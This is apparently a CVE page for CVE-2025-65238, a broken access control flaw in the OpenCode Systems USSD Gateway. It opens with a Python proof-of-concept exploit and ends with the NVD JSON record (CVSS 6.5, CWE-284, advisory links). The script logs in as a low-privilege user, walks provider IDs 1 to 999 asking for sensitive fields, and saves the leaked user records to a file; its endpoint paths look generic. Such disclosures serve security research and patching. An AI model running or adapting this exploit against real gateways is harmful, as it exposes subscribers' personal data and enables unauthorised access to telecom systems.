CVE-2025-65238

import requests import json # CVE-2025-65238 PoC - OpenCode USSD Gateway Access Control Bypass # Target: OpenCode Systems USSD Gateway OC Release: 5 Version 6.13.11 # Vulnerability: Incorrect access control in getSubUsersByProvider function TARGET_URL = "https://target-ussd-gateway.com" def exploit_cve_2025_65238(): """ Exploit for CVE-2025-65238: Broken Access Control in getSubUsersByProvider This PoC demonstrates how low-privilege users can dump all user records. """ # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/api/auth/login" login_data = { "username": "low_privilege_user", "password": "password123" } session = requests.Session() login_response = session.post(login_url, json=login_data) if login_response.status_code != 200: print("[-] Authentication failed") return print("[+] Successfully authenticated with low-privilege account") # Step 2: Exploit the access control vulnerability # The getSubUsersByProvider function does not properly validate permissions exploit_url = f"{TARGET_URL}/api/users/getSubUsersByProvider" # Step 3: Dump user records by iterating through user IDs leaked_users = [] for user_id in range(1, 1000): payload = { "provider_id": user_id, "include_sensitive": True } response = session.post(exploit_url, json=payload) if response.status_code == 200: data = response.json() if data.get("users"): leaked_users.extend(data["users"]) print(f"[+] Leaked {len(data['users'])} user records for provider_id: {user_id}") # Step 4: Save leaked data if leaked_users: with open("leaked_users.json", "w") as f: json.dump(leaked_users, f, indent=2) print(f"[+] Total leaked users: {len(leaked_users)}") print("[+] Data saved to leaked_users.json") if __name__ == "__main__": exploit_cve_2025_65238()

{"cve": {"id": "CVE-2025-65238", "sourceIdentifier": "[email protected]", "published": "2025-11-26T17:15:47.460", "lastModified": "2026-01-02T20:46:04.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the getSubUsersByProvider function of OpenCode Systems USSD Gateway OC Release: 5 Version 6.13.11 allows attackers with low-level privileges to dump user records and access sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opencode:ussd_gateway:6.13.11:*:*:*:*:*:*:*", "matchCriteriaId": "56AD3C50-7C66-4B18-9817-AC6E9D7E8B42"}]}]}], "references": [{"url": "https://eslam3kl.gitbook.io", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65238-ussd-gateway-broken-access-control-sessions", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/eslam3kl", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://eslam3kl.gitbook.io/blog/web-application-findings/cve-2025-65238-ussd-gateway-broken-access-control-sessions", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}